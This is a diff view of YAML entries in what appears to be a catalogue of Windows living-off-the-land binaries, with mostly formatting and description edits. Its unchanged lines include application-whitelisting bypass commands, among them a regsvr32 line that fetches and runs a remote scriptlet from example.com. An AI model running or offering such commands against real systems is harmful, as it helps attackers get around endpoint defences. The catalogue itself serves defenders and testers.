Acknowledgement:
|
||||
- Person: Eli Salem
|
||||
Handle: '@elisalem9'
|
||||
---
|
||||
|
@ -24,4 +24,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Philip Tsukerman
|
||||
Handle: '@PhilipTsukerman'
|
||||
---
|
||||
|
@ -14,7 +14,7 @@ Commands:
|
||||
- Command: regsvcs.exe AllTheThingsx64.dll
|
||||
Description: Loads the target .DLL file and executes the RegisterClass function.
|
||||
Usecase: Execute dll file and bypass Application whitelisting
|
||||
Category: AWL bypass
|
||||
Category: AWL Bypass
|
||||
Privileges: Local Admin
|
||||
MitreID: T1218.009
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
@ -34,4 +34,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Casey Smith
|
||||
Handle: '@subtee'
|
||||
---
|
||||
|
@ -7,14 +7,14 @@ Commands:
|
||||
- Command: regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll
|
||||
Description: Execute the specified remote .SCT script with scrobj.dll.
|
||||
Usecase: Execute code from remote scriptlet, bypass Application whitelisting
|
||||
Category: AWL bypass
|
||||
Category: AWL Bypass
|
||||
Privileges: User
|
||||
MitreID: T1218.010
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
- Command: regsvr32.exe /s /u /i:file.sct scrobj.dll
|
||||
Description: Execute the specified local .SCT script with scrobj.dll.
|
||||
Usecase: Execute code from scriptlet, bypass Application whitelisting
|
||||
Category: AWL bypass
|
||||
Category: AWL Bypass
|
||||
Privileges: User
|
||||
MitreID: T1218.010
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
@ -57,4 +57,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Casey Smith
|
||||
Handle: '@subtee'
|
||||
---
|
||||
|
@ -32,4 +32,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: elceef
|
||||
Handle: '@elceef'
|
||||
---
|
||||
|
@ -39,4 +39,3 @@ Acknowledgement:
|
||||
Handle: '@splinter_code'
|
||||
- Person: ap
|
||||
Handle: '@decoder_it'
|
||||
---
|
||||
|
@ -91,4 +91,3 @@ Acknowledgement:
|
||||
Handle: '@404death'
|
||||
- Person: Martin Ingesen
|
||||
Handle: '@Mrtn9'
|
||||
---
|
||||
|
@ -1,6 +1,6 @@
|
||||
---
|
||||
Name: Runonce.exe
|
||||
Description:
|
||||
Description: Executes a Run Once Task that has been configured in the registry
|
||||
Author: 'Oddvar Moe'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
@ -27,4 +27,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Pierre-Alexandre Braeken
|
||||
Handle: '@pabraeken'
|
||||
---
|
||||
|
@ -1,6 +1,6 @@
|
||||
---
|
||||
Name: Runscripthelper.exe
|
||||
Description:
|
||||
Description: Execute target PowerShell script
|
||||
Author: 'Oddvar Moe'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
@ -26,4 +26,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Matt Graeber
|
||||
Handle: '@mattifestation'
|
||||
---
|
||||
|
@ -36,4 +36,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Oddvar Moe
|
||||
Handle: '@oddvarmoe'
|
||||
---
|
||||
|
@ -33,4 +33,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person:
|
||||
Handle:
|
||||
---
|
||||
|
@ -1,6 +1,6 @@
|
||||
---
|
||||
Name: Scriptrunner.exe
|
||||
Description:
|
||||
Description: Execute binary through proxy binary to evade defensive counter measures
|
||||
Author: 'Oddvar Moe'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
@ -33,4 +33,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Nick Tyrer
|
||||
Handle: '@nicktyrer'
|
||||
---
|
||||
|
@ -31,4 +31,3 @@ Acknowledgement:
|
||||
Handle: '@hexacorn'
|
||||
- Person: Elliot Killick
|
||||
Handle: '@elliotkillick'
|
||||
---
|
||||
|
@ -22,4 +22,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Eral4m
|
||||
Handle: '@eral4m'
|
||||
---
|
||||
|
@ -25,4 +25,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Nick Landers
|
||||
Handle: '@monoxgas'
|
||||
---
|
||||
|
@ -35,4 +35,3 @@ Acknowledgement:
|
||||
Handle: '@oddvarmoe'
|
||||
- Person: Maxime Nadeau
|
||||
Handle: '@m_nad0'
|
||||
---
|
||||
|
@ -37,4 +37,3 @@ Acknowledgement:
|
||||
Handle: '@oulusoyum'
|
||||
- Person: Matt Graeber
|
||||
Handle: '@mattifestation'
|
||||
---
|
||||
|
@ -31,4 +31,3 @@ Acknowledgement:
|
||||
Handle:
|
||||
- Person: Hai Vaknin(Lux)
|
||||
Handle:
|
||||
---
|
||||
|
Some files were not shown because too many files have changed in this diff Show More
Loading…
Reference in New Issue
Block a user